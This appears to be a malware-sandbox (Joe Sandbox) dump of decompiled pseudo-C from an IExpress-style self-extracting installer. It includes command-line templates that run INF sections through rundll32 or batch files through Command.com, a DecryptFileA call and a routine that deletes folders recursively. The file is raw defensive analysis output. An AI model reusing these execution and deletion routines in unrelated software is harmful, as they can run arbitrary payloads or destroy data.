                                                								_t65 = GetFileAttributesA( &_v268); // executed
                                                								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                									E01061680( &_v1552, 0x400, _t108);
                                                								} else {
                                                									_push(_t115);
                                                									_t108 = 0x400;
                                                									E01061781( &_v1552, 0x400, _t115,  &_v268);
                                                									if(_t151 != 0 &&  *_t151 != 0) {
                                                										E010616B3( &_v1552, 0x400, " ");
                                                										E010616B3( &_v1552, 0x400, _t151);
                                                									}
                                                								}
                                                								_t140 = _t156;
                                                								 *_t156 = 0;
                                                								E01062AAC( &_v1552, _t156, _t156);
                                                								goto L53;
                                                							} else {
                                                								_t108 = "Command.com /c %s";
                                                								_t125 = "Command.com /c %s";
                                                								_t145 = _t125 + 1;
                                                								do {
                                                									_t76 =  *_t125;
                                                									_t125 = _t125 + 1;
                                                								} while (_t76 != 0);
                                                								_t126 = _t125 - _t145;
                                                								_t146 =  &_v268;
                                                								_t157 = _t146 + 1;
                                                								do {
                                                									_t77 =  *_t146;
                                                									_t146 = _t146 + 1;
                                                								} while (_t77 != 0);
                                                								_t140 = _t146 - _t157;
                                                								_t154 = _t126 + 8 + _t146 - _t157;
                                                								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                								if(_t156 != 0) {
                                                									E0106171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                									goto L53;
                                                								}
                                                								goto L43;
                                                							}
                                                						} else {
                                                							_t85 = GetFileAttributesA( &_v268);
                                                							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                								_t140 = 0x525;
                                                								_push(0);
                                                								_push(0x10);
                                                								_push(0);
                                                								_t60 =  &_v268;
                                                								goto L35;
                                                							} else {
                                                								_t140 = "[";
                                                								_v1556 = _t151;
                                                								_t90 = E01061A84( &_v1556, "[");
                                                								if(_t90 != 0) {
                                                									if( *_t90 != 0) {
                                                										_v1556 = _t90;
                                                									}
                                                									_t140 = "]";
                                                									E01061A84( &_v1556, "]");
                                                								}
                                                								_t156 = LocalAlloc(0x40, 0x200);
                                                								if(_t156 == 0) {
                                                									L43:
                                                									_t60 = 0;
                                                									_t140 = 0x4b5;
                                                									_push(0);
                                                									_push(0x10);
                                                									_push(0);
                                                									L35:
                                                									_push(_t60);
                                                									E010644B9(0, _t140);
                                                									_t62 = 0;
                                                									goto L54;
                                                								} else {
                                                									_t155 = _v1556;
                                                									_t92 = _t155;
                                                									if( *_t155 == 0) {
                                                										_t92 = "DefaultInstall";
                                                									}
                                                									 *0x1069120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                									 *_v1560 = 1;
                                                									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x1061140, _t156, 8,  &_v268) == 0) {
                                                										 *0x1069a34 =  *0x1069a34 & 0xfffffffb;
                                                										if( *0x1069a40 != 0) {
                                                											_t108 = "setupapi.dll";
                                                										} else {
                                                											_t108 = "setupx.dll";
                                                											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                										}
                                                										if( *_t155 == 0) {
                                                											_t155 = "DefaultInstall";
                                                										}
                                                										_push( &_v268);
                                                										_push(_t155);
                                                										E0106171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                									} else {
                                                										 *0x1069a34 =  *0x1069a34 | 0x00000004;
                                                										if( *_t155 == 0) {
                                                											_t155 = "DefaultInstall";
                                                										}
                                                										E01061680(_t108, 0x104, _t155);
                                                										_t140 = 0x200;
                                                										E01061680(_t156, 0x200,  &_v268);
                                                									}
                                                									L53:
                                                									_t62 = 1;
                                                									 *_v1564 = _t156;
                                                									L54:
                                                									_pop(_t152);
                                                									return E01066CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}














































                                                0x01061af3
                                                0x01061afa
                                                0x01061b07
                                                0x01061b09
                                                0x01061b1a
                                                0x01061b20
                                                0x01061b2c
                                                0x01061b3b
                                                0x01061b40
                                                0x01061b2e
                                                0x01061b2e
                                                0x01061b33
                                                0x01061b33
                                                0x01061b46
                                                0x01061b4c
                                                0x01061b52
                                                0x01061b57
                                                0x01061b5d
                                                0x01061b61
                                                0x01061b9f
                                                0x01061b9f
                                                0x01061bb1
                                                0x01061bc2
                                                0x00000000
                                                0x01061b63
                                                0x01061b63
                                                0x01061b65
                                                0x01061b68
                                                0x01061b68
                                                0x01061b6a
                                                0x01061b6b
                                                0x01061b6f
                                                0x01061b74
                                                0x00000000
                                                0x00000000
                                                0x01061b76
                                                0x01061b7b
                                                0x01061b86
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01061b8c
                                                0x01061b8c
                                                0x01061b98
                                                0x01061bc7
                                                0x01061bc9
                                                0x01061bcc
                                                0x01061bd3
                                                0x01061d75
                                                0x01061d76
                                                0x01061d78
                                                0x01061d7f
                                                0x01061e05
                                                0x01061e09
                                                0x00000000
                                                0x00000000
                                                0x01061e12
                                                0x01061e1b
                                                0x01061e73
                                                0x01061e21
                                                0x01061e21
                                                0x01061e28
                                                0x01061e37
                                                0x01061e3e
                                                0x01061e52
                                                0x01061e60
                                                0x01061e60
                                                0x01061e3e
                                                0x01061e79
                                                0x01061e7b
                                                0x01061e84
                                                0x00000000
                                                0x01061d9b
                                                0x01061d9b
                                                0x01061da0
                                                0x01061da2
                                                0x01061da5
                                                0x01061da5
                                                0x01061da7
                                                0x01061da8
                                                0x01061dac
                                                0x01061dae
                                                0x01061db4
                                                0x01061db7
                                                0x01061db7
                                                0x01061db9
                                                0x01061dba
                                                0x01061dbe
                                                0x01061dc3
                                                0x01061dce
                                                0x01061dd2
                                                0x01061deb
                                                0x00000000
                                                0x01061df0
                                                0x00000000
                                                0x01061dd2
                                                0x01061bf7
                                                0x01061bfe
                                                0x01061c07
                                                0x01061d55
                                                0x01061d5a
                                                0x01061d5b
                                                0x01061d5d
                                                0x01061d5e
                                                0x00000000
                                                0x01061c1b
                                                0x01061c1b
                                                0x01061c20
                                                0x01061c2c
                                                0x01061c33
                                                0x01061c38
                                                0x01061c3a
                                                0x01061c3a
                                                0x01061c40
                                                0x01061c4b
                                                0x01061c4b
                                                0x01061c5d
                                                0x01061c61
                                                0x01061dd4
                                                0x01061dd4
                                                0x01061dd6
                                                0x01061ddb
                                                0x01061ddc
                                                0x01061dde
                                                0x01061d64
                                                0x01061d64
                                                0x01061d67
                                                0x01061d6c
                                                0x00000000
                                                0x01061c67
                                                0x01061c67
                                                0x01061c6d
                                                0x01061c72
                                                0x01061c74
                                                0x01061c74
                                                0x01061c8e
                                                0x01061c99
                                                0x01061cc0
                                                0x01061cf8
                                                0x01061d07
                                                0x01061d23
                                                0x01061d09
                                                0x01061d14
                                                0x01061d1b
                                                0x01061d1b
                                                0x01061d2b
                                                0x01061d2d
                                                0x01061d2d
                                                0x01061d38
                                                0x01061d39
                                                0x01061d46
                                                0x01061cc2
                                                0x01061cc2
                                                0x01061ccc
                                                0x01061cce
                                                0x01061cce
                                                0x01061cdb
                                                0x01061ce6
                                                0x01061cee
                                                0x01061cee
                                                0x01061e89
                                                0x01061e91
                                                0x01061e92
                                                0x01061e94
                                                0x01061e97
                                                0x01061ea4
                                                0x01061ea4
                                                0x01061c61
                                                0x01061c07
                                                0x01061bd3
                                                0x01061b7b

                                                APIs
                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01061BE7
                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01061BFE
                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01061C57
                                                • GetPrivateProfileIntA.KERNEL32 ref: 01061C88
                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,01061140,00000000,00000008,?), ref: 01061CB8
                                                • GetShortPathNameA.KERNEL32 ref: 01061D1B
                                                  • Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
                                                  • Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                • API String ID: 383838535-2869639027
                                                • Opcode ID: 59dde3658436be461f6b2eb4ac01a485784d5a24b36a18ff38ac8c45cf6824b3
                                                • Instruction ID: f520792ccbca8ad56b6e21f3ae429c9f04be921ff155f1b285182c68272629f5
                                                • Opcode Fuzzy Hash: 59dde3658436be461f6b2eb4ac01a485784d5a24b36a18ff38ac8c45cf6824b3
                                                • Instruction Fuzzy Hash: 65A14B70A00219ABEB70EB28CC44BEA77ADAFD5310F1442D9E5D5E72C0DBB59E85CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 450 1062f1d-1062f3d 451 1062f3f-1062f46 450->451 452 1062f6c-1062f73 call 1065164 450->452 454 1062f5f-1062f66 call 1063a3f 451->454 455 1062f48 call 10651e5 451->455 460 1063041 452->460 461 1062f79-1062f80 call 10655a0 452->461 454->452 454->460 462 1062f4d-1062f4f 455->462 465 1063043-1063053 call 1066ce0 460->465 461->460 469 1062f86-1062fbe GetSystemDirectoryA call 106658a LoadLibraryA 461->469 462->460 463 1062f55-1062f5d 462->463 463->452 463->454 472 1062ff7-1063004 FreeLibrary 469->472 473 1062fc0-1062fd4 GetProcAddress 469->473 474 1063006-106300c 472->474 475 1063017-1063024 SetCurrentDirectoryA 472->475 473->472 476 1062fd6-1062fee DecryptFileA 473->476 474->475 477 106300e call 106621e 474->477 478 1063026-106303c call 10644b9 call 1066285 475->478 479 1063054-106305a 475->479 476->472 485 1062ff0-1062ff5 476->485 489 1063013-1063015 477->489 478->460 481 1063065-106306c 479->481 482 106305c call 1063b26 479->482 487 106306e-1063075 call 106256d 481->487 488 106307c-1063089 481->488 491 1063061-1063063 482->491 485->472 498 106307a 487->498 493 10630a1-10630a9 488->493 494 106308b-1063091 488->494 489->460 489->475 491->460 491->481 496 10630b4-10630b7 493->496 497 10630ab-10630ad 493->497 494->493 499 1063093 call 1063ba2 494->499 496->465 497->496 501 10630af call 1064169 497->501 498->488 504 1063098-106309a 499->504 501->496 504->460 505 106309c 504->505 505->493
                                                C-Code - Quality: 82%
                                                			E01062F1D(void* __ecx, int __edx) {
                                                				signed int _v8;
                                                				char _v272;
                                                				_Unknown_base(*)()* _v276;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t9;
                                                				void* _t11;
                                                				struct HWND__* _t12;
                                                				void* _t14;
                                                				int _t21;
                                                				signed int _t22;
                                                				signed int _t25;
                                                				intOrPtr* _t26;
                                                				signed int _t27;
                                                				void* _t30;
                                                				_Unknown_base(*)()* _t31;
                                                				void* _t34;
                                                				struct HINSTANCE__* _t36;
                                                				intOrPtr _t41;
                                                				intOrPtr* _t44;
                                                				signed int _t46;
                                                				int _t47;
                                                				void* _t58;
                                                				void* _t59;
                                                
                                                				_t43 = __edx;
                                                				_t9 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t9 ^ _t46;
                                                				if( *0x1068a38 != 0) {
                                                					L5:
                                                					_t11 = E01065164(_t52);
                                                					_t53 = _t11;
                                                					if(_t11 == 0) {
                                                						L16:
                                                						_t12 = 0;
                                                						L17:
                                                						return E01066CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                					}
                                                					_t14 = E010655A0(_t53); // executed
                                                					if(_t14 == 0) {
                                                						goto L16;
                                                					} else {
                                                						_t45 = 0x105;
                                                						GetSystemDirectoryA( &_v272, 0x105);
                                                						_t43 = 0x105;
                                                						_t40 =  &_v272;
                                                						E0106658A( &_v272, 0x105, "advapi32.dll");
                                                						_t36 = LoadLibraryA( &_v272);
                                                						_t44 = 0;
                                                						if(_t36 != 0) {
                                                							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                							_v276 = _t31;
                                                							if(_t31 != 0) {
                                                								_t45 = _t47;
                                                								_t40 = _t31;
                                                								 *0x106a288("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                								_v276();
                                                								if(_t47 != _t47) {
                                                									_t40 = 4;
                                                									asm("int 0x29");
                                                								}
                                                							}
                                                						}
                                                						FreeLibrary(_t36);
                                                						_t58 =  *0x1068a24 - _t44; // 0x0
                                                						if(_t58 != 0) {
                                                							L14:
                                                							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                							if(_t21 != 0) {
                                                								__eflags =  *0x1068a2c - _t44; // 0x0
                                                								if(__eflags != 0) {
                                                									L20:
                                                									__eflags =  *0x1068d48 & 0x000000c0;
                                                									if(( *0x1068d48 & 0x000000c0) == 0) {
                                                										_t41 =  *0x1069a40; // 0x3, executed
                                                										_t26 = E0106256D(_t41); // executed
                                                										_t44 = _t26;
                                                									}
                                                									_t22 =  *0x1068a24; // 0x0
                                                									 *0x1069a44 = _t44;
                                                									__eflags = _t22;
                                                									if(_t22 != 0) {
                                                										L26:
                                                										__eflags =  *0x1068a38;
                                                										if( *0x1068a38 == 0) {
                                                											__eflags = _t22;
                                                											if(__eflags == 0) {
                                                												E01064169(__eflags);
                                                											}
                                                										}
                                                										_t12 = 1;
                                                										goto L17;
                                                									} else {
                                                										__eflags =  *0x1069a30 - _t22; // 0x0
                                                										if(__eflags != 0) {
                                                											goto L26;
                                                										}
                                                										_t25 = E01063BA2(); // executed
                                                										__eflags = _t25;
                                                										if(_t25 == 0) {
                                                											goto L16;
                                                										}
                                                										_t22 =  *0x1068a24; // 0x0
                                                										goto L26;
                                                									}
                                                								}
                                                								_t27 = E01063B26(_t40, _t44);
                                                								__eflags = _t27;
                                                								if(_t27 == 0) {
                                                									goto L16;
                                                								}
                                                								goto L20;
                                                							}
                                                							_t43 = 0x4bc;
                                                							E010644B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                							 *0x1069124 = E01066285();
                                                							goto L16;
                                                						}
                                                						_t59 =  *0x1069a30 - _t44; // 0x0
                                                						if(_t59 != 0) {
                                                							goto L14;
                                                						}
                                                						_t30 = E0106621E(); // executed
                                                						if(_t30 == 0) {
                                                							goto L16;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                				_t49 =  *0x1068a24;
                                                				if( *0x1068a24 != 0) {
                                                					L4:
                                                					_t34 = E01063A3F(_t51);
                                                					_t52 = _t34;
                                                					if(_t34 == 0) {
                                                						goto L16;
                                                					}
                                                					goto L5;
                                                				}
                                                				if(E010651E5(_t49) == 0) {
                                                					goto L16;
                                                				}
                                                				_t51 =  *0x1068a38;
                                                				if( *0x1068a38 != 0) {
                                                					goto L5;
                                                				}
                                                				goto L4;
                                                			}




























                                                0x01062f1d
                                                0x01062f28
                                                0x01062f2f
                                                0x01062f3d
                                                0x01062f6c
                                                0x01062f6c
                                                0x01062f71
                                                0x01062f73
                                                0x01063041
                                                0x01063041
                                                0x01063043
                                                0x01063053
                                                0x01063053
                                                0x01062f79
                                                0x01062f80
                                                0x00000000
                                                0x01062f86
                                                0x01062f86
                                                0x01062f93
                                                0x01062f9e
                                                0x01062fa0
                                                0x01062fa6
                                                0x01062fb8
                                                0x01062fba
                                                0x01062fbe
                                                0x01062fc6
                                                0x01062fcc
                                                0x01062fd4
                                                0x01062fd6
                                                0x01062fd8
                                                0x01062fe0
                                                0x01062fe6
                                                0x01062fee
                                                0x01062ff0
                                                0x01062ff5
                                                0x01062ff5
                                                0x01062fee
                                                0x01062fd4
                                                0x01062ff8
                                                0x01062ffe
                                                0x01063004
                                                0x01063017
                                                0x0106301c
                                                0x01063024
                                                0x01063054
                                                0x0106305a
                                                0x01063065
                                                0x01063065
                                                0x0106306c
                                                0x0106306e
                                                0x01063075
                                                0x0106307a
                                                0x0106307a
                                                0x0106307c
                                                0x01063081
                                                0x01063087
                                                0x01063089
                                                0x010630a1
                                                0x010630a1
                                                0x010630a9
                                                0x010630ab
                                                0x010630ad
                                                0x010630af
                                                0x010630af
                                                0x010630ad
                                                0x010630b6
                                                0x00000000
                                                0x0106308b
                                                0x0106308b
                                                0x01063091
                                                0x00000000
                                                0x00000000
                                                0x01063093
                                                0x01063098
                                                0x0106309a
                                                0x00000000
                                                0x00000000
                                                0x0106309c
                                                0x00000000
                                                0x0106309c
                                                0x01063089
                                                0x0106305c
                                                0x01063061
                                                0x01063063
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01063063
                                                0x0106302b
                                                0x01063032
                                                0x0106303c
                                                0x00000000
                                                0x0106303c
                                                0x01063006
                                                0x0106300c
                                                0x00000000
                                                0x00000000
                                                0x0106300e
                                                0x01063015
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01063015
                                                0x01062f80
                                                0x01062f3f
                                                0x01062f46
                                                0x01062f5f
                                                0x01062f5f
                                                0x01062f64
                                                0x01062f66
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01062f66
                                                0x01062f4f
                                                0x00000000
                                                0x00000000
                                                0x01062f55
                                                0x01062f5d
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 01062F93
                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 01062FB2
                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01062FC6
                                                • DecryptFileA.ADVAPI32 ref: 01062FE6
                                                • FreeLibrary.KERNEL32(00000000), ref: 01062FF8
                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0106301C
                                                  • Part of subcall function 010651E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01062F4D,?,00000002,00000000), ref: 01065201
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                • API String ID: 2126469477-1274120739
                                                • Opcode ID: 8086a881c8b9c340cf7334341f62dcb008fddedec6be5d8c53b06af0a3faabaf
                                                • Instruction ID: 89d528162242f029185395d9d9f706642690de59244279a43d71aa2e0d264121
                                                • Opcode Fuzzy Hash: 8086a881c8b9c340cf7334341f62dcb008fddedec6be5d8c53b06af0a3faabaf
                                                • Instruction Fuzzy Hash: 1E41E930A00306DAFB71AB799C5469A37ECAB54754F0040A9FEC5CB556EB7AC584CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 86%
                                                			E01062390(CHAR* __ecx) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v280;
                                                				char _v284;
                                                				struct _WIN32_FIND_DATAA _v596;
                                                				struct _WIN32_FIND_DATAA _v604;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t21;
                                                				int _t36;
                                                				void* _t46;
                                                				void* _t62;
                                                				void* _t63;
                                                				CHAR* _t65;
                                                				void* _t66;
                                                				signed int _t67;
                                                				signed int _t69;
                                                
                                                				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                				_t21 =  *0x1068004; // 0x19e58fb5
                                                				_t22 = _t21 ^ _t69;
                                                				_v8 = _t21 ^ _t69;
                                                				_t65 = __ecx;
                                                				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                					L10:
                                                					_pop(_t62);
                                                					_pop(_t66);
                                                					_pop(_t46);
                                                					return E01066CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                				} else {
                                                					E01061680( &_v276, 0x104, __ecx);
                                                					_t58 = 0x104;
                                                					E010616B3( &_v280, 0x104, "*");
                                                					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                					_t63 = _t22;
                                                					if(_t63 == 0xffffffff) {
                                                						goto L10;
                                                					} else {
                                                						goto L3;
                                                					}
                                                					do {
                                                						L3:
                                                						_t58 = 0x104;
                                                						E01061680( &_v276, 0x104, _t65);
                                                						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                							_t58 = 0x104;
                                                							E010616B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                							SetFileAttributesA( &_v280, 0x80);
                                                							DeleteFileA( &_v280);
                                                						} else {
                                                							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                								E010616B3( &_v276, 0x104,  &(_v596.cFileName));
                                                								_t58 = 0x104;
                                                								E0106658A( &_v280, 0x104, 0x1061140);
                                                								E01062390( &_v284);
                                                							}
                                                						}
                                                						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                					} while (_t36 != 0);
                                                					FindClose(_t63); // executed
                                                					_t22 = RemoveDirectoryA(_t65); // executed
                                                					goto L10;
                                                				}
                                                			}





















                                                0x01062398
                                                0x0106239e
                                                0x010623a3
                                                0x010623a5
                                                0x010623ae
                                                0x010623b3
                                                0x010624cb
                                                0x010624d2
                                                0x010624d3
                                                0x010624d4
                                                0x010624df
                                                0x010623c2
                                                0x010623d1
                                                0x010623db
                                                0x010623e4
                                                0x010623f6
                                                0x010623fc
                                                0x01062401
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01062407
                                                0x01062407
                                                0x01062408
                                                0x01062411
                                                0x0106241f
                                                0x0106247a
                                                0x01062483
                                                0x01062495
                                                0x010624a3
                                                0x01062421
                                                0x0106242f
                                                0x01062453
                                                0x0106245d
                                                0x01062466
                                                0x01062472
                                                0x01062472
                                                0x0106242f
                                                0x010624af
                                                0x010624b5
                                                0x010624be
                                                0x010624c5
                                                0x00000000
                                                0x010624c5

                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,01068A3A,010611F4,01068A3A,00000000,?,?), ref: 010623F6
                                                • lstrcmpA.KERNEL32(?,010611F8), ref: 01062427
                                                • lstrcmpA.KERNEL32(?,010611FC), ref: 0106243B
                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 01062495
                                                • DeleteFileA.KERNEL32(?), ref: 010624A3
                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010624AF
                                                • FindClose.KERNELBASE(00000000), ref: 010624BE
                                                • RemoveDirectoryA.KERNELBASE(01068A3A), ref: 010624C5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                • String ID:
                                                • API String ID: 836429354-0
                                                • Opcode ID: efbeadbe5bbd53191ed98582b7a60dbde997aad3c9cc91c65024f28b179fef04
                                                • Instruction ID: c080865a7513add5f3595b491da2748f6cefdd1714581d0ba4d4e7a5b61ca7ec
                                                • Opcode Fuzzy Hash: efbeadbe5bbd53191ed98582b7a60dbde997aad3c9cc91c65024f28b179fef04
                                                • Instruction Fuzzy Hash: 7E316F31704641EBD330EBA8CC89AEB77ECABD8305F04492DF5D58B294EF7999098752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E01062BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				long _t4;
                                                				void* _t6;
                                                				intOrPtr _t7;
                                                				void* _t9;
                                                				struct HINSTANCE__* _t12;
                                                				intOrPtr* _t17;
                                                				signed char _t19;
                                                				intOrPtr* _t21;
                                                				void* _t22;
                                                				void* _t24;
                                                				intOrPtr _t32;
                                                
                                                				_t4 = GetVersion();
                                                				if(_t4 >= 0 && _t4 >= 6) {
                                                					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                					if(_t12 != 0) {
                                                						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                						if(_t21 != 0) {
                                                							_t17 = _t21;
                                                							 *0x106a288(0, 1, 0, 0);
                                                							 *_t21();
                                                							_t29 = _t24 - _t24;
                                                							if(_t24 != _t24) {
                                                								_t17 = 4;
                                                								asm("int 0x29");
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t20 = _a12;
                                                				_t18 = _a4;
                                                				 *0x1069124 = 0;
                                                				if(E01062CAA(_a4, _a12, _t29, _t17) != 0) {
                                                					_t9 = E01062F1D(_t18, _t20); // executed
                                                					_t22 = _t9; // executed
                                                					E010652B6(0, _t18, _t21, _t22); // executed
                                                					if(_t22 != 0) {
                                                						_t32 =  *0x1068a3a; // 0x0
                                                						if(_t32 == 0) {
                                                							_t19 =  *0x1069a2c; // 0x0
                                                							if((_t19 & 0x00000001) != 0) {
                                                								E01061F90(_t19, _t21, _t22);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t6 =  *0x1068588; // 0x0
                                                				if(_t6 != 0) {
                                                					CloseHandle(_t6);
                                                				}
                                                				_t7 =  *0x1069124; // 0x80070002
                                                				return _t7;
                                                			}


















                                                0x01062c03
                                                0x01062c0d
                                                0x01062c18
                                                0x01062c20
                                                0x01062c2e
                                                0x01062c32
                                                0x01062c36
                                                0x01062c3d
                                                0x01062c43
                                                0x01062c45
                                                0x01062c47
                                                0x01062c49
                                                0x01062c4e
                                                0x01062c4e
                                                0x01062c47
                                                0x01062c32
                                                0x01062c20
                                                0x01062c50
                                                0x01062c54
                                                0x01062c57
                                                0x01062c64
                                                0x01062c66
                                                0x01062c6b
                                                0x01062c6d
                                                0x01062c74
                                                0x01062c76
                                                0x01062c7c
                                                0x01062c7e
                                                0x01062c87
                                                0x01062c89
                                                0x01062c89
                                                0x01062c87
                                                0x01062c7c
                                                0x01062c74
                                                0x01062c8e
                                                0x01062c95
                                                0x01062c98
                                                0x01062c98
                                                0x01062c9e
                                                0x01062ca7

                                                APIs
                                                • GetVersion.KERNEL32(?,00000002,00000000,?,01066BB0,01060000,00000000,00000002,0000000A), ref: 01062C03
                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,01066BB0,01060000,00000000,00000002,0000000A), ref: 01062C18
                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 01062C28
                                                • CloseHandle.KERNEL32(00000000,?,?,01066BB0,01060000,00000000,00000002,0000000A), ref: 01062C98
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                • String ID: HeapSetInformation$Kernel32.dll
                                                • API String ID: 62482547-3460614246
                                                • Opcode ID: d248a4ae0992c5e24c448392cdf0133072deb310beaeffbb46ac3d6aadc0c5e2
